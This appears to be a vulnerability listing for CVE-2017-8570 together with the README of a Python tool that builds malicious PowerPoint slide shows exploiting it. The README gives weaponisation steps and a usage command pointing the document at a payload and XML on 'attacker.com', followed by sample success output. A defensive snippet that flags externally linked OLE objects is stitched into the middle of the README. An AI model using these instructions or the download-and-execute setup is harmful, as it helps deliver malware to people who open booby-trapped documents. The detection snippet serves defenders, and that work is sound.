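Related vulnerability
Title: Microsoft Office security vulnerability (CVE-2017-8570)
Description: Microsoft Office is an office software suite developed by Microsoft. Commonly used components include Word, Excel, Access, Powerpoint, FrontPage and others. Microsoft Office contains a remote code execution vulnerability that arises because the program does not correctly handle objects in memory. A remote attacker can use a specially crafted file to exploit the vulnerability and execute arbitrary code in the context of the current user or cause a denial of service. The following versions are affected: Microsoft Office 2007 SP3, Office 2010 SP2, Office 2013 RT SP1,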
Description
ppsx file generator for cve-2017-8570 (based on bhdresh/cve-2017-8570)
Introduction
# Introduction
By Temesgen Yibeltal temu1yibeltal@gmail.com (Based on code by https://github.com/bhdresh/CVE-2017-8570 (now removed))
ppsx-file-generator is a Python tool that takes an existing presentation file and generates a PowerPoint slide show (.ppsx) file that executes code from a remote source.
# What does it do?
The tool generates a PowerPoint slide show file and an XML file from the input provided. The PowerPoint file accesses the XML file, which holds information about the payload file. An attacker could serve the XML file and the payload on a local or public server and provide the URL of each as input.
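For triage of incoming .ppsx files, the remote reference described above can be looked for in the package's relationship parts. The following is an added example, not code from this repository: it assumes the remote XML is referenced through an OOXML relationship with `TargetMode="External"`, and the function names, the size limit and the sample package are constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
RT = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
MAX_PART = 1 << 20  # assumed limit: ignore .rels parts larger than 1 MiB

def external_relationships(ppsx_bytes):
    """Return (part, type, target, is_ole) for each External relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(ppsx_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.endswith(".rels") or info.file_size > MAX_PART:
                continue
            try:
                # For hostile input, defusedxml (third-party) limits entity expansion.
                root = ET.fromstring(zf.read(info))
            except ET.ParseError:
                findings.append((info.filename, "unparseable", "", False))
                continue
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "").lower() != "external":
                    continue
                rtype = rel.get("Type", "")
                findings.append((info.filename, rtype, rel.get("Target", ""),
                                 rtype == RT + "oleObject"))
    return findings

def build_sample():
    """Constructed sample: a zip holding one slide .rels part (not a full deck)."""
    rel = '<Relationship Id="rId{}" Type="' + RT + '{}" Target="{}"{}/>'
    ext = ' TargetMode="External"'
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            + rel.format(1, "slideLayout", "../slideLayouts/slideLayout1.xml", "")
            + rel.format(2, "hyperlink", "https://example.invalid/docs", ext)
            + rel.format(3, "oleObject", "http://example.invalid/content.xml", ext)
            + "</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()

if __name__ == "__main__":
    for part, rtype, target, is_ole in external_relationships(build_sample()):
        # Externally linked OLE objects are rare in legitimate slide shows.
        print("[HIGH]" if is_ole else "[info]", part, rtype.rsplit("/", 1)[-1], "->", target)
```

External hyperlinks are common in ordinary decks, so only the externally linked OLE object is flagged as high priority for review.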
# Getting the code
First, get the code:
```
git clone https://github.com/temesgeny/ppsx-file-generator.git
```
ppsx-file-generator is written in Python and requires the zipfile module. zipfile is part of the Python standard library, so the `pip install zipfile` step given in the original README is not needed.
Microsoft Office PowerPoint is required to carry out this task.
# Usage
First open Microsoft Office PowerPoint and open 'template.ppsx'. Open your own presentation file and copy the icon 'Coder.exe' from template.ppsx to slide 1 of your PowerPoint file. Save the file as PowerPoint Show (.ppsx). Then run the Python tool as follows:
```
Usage: generate_ppsx.py input_filename -o output_filename -p payload_uri -x xml_uri
    input_filename   The input ppsx file name.
    -o               Output .ppsx file name (include the .ppsx).
    -p               The payload exe or sct file url.
                     It must be in an accessible web server. (Optional for xml file)
    -x               The full xml uri to be called by the ppsx file.
                     It must be in an accessible web server. (Required)
```
```
python generate_ppsx.py -o output.ppsx -p http://attacker.com/payload.exe -x http://attacker.com/content.xml input.ppsx
Generated content.xml successfully
Generated output.ppsx successfully
```
File snapshot
[4.0K] /data/pocs/5fc4cd35c9556d55375eb494703fbf5097b73ab5
├── [8.3K] generate_ppsx.py
├── [1.8K] README.md
└── [ 32K] template.ppsx
0 directories, 3 files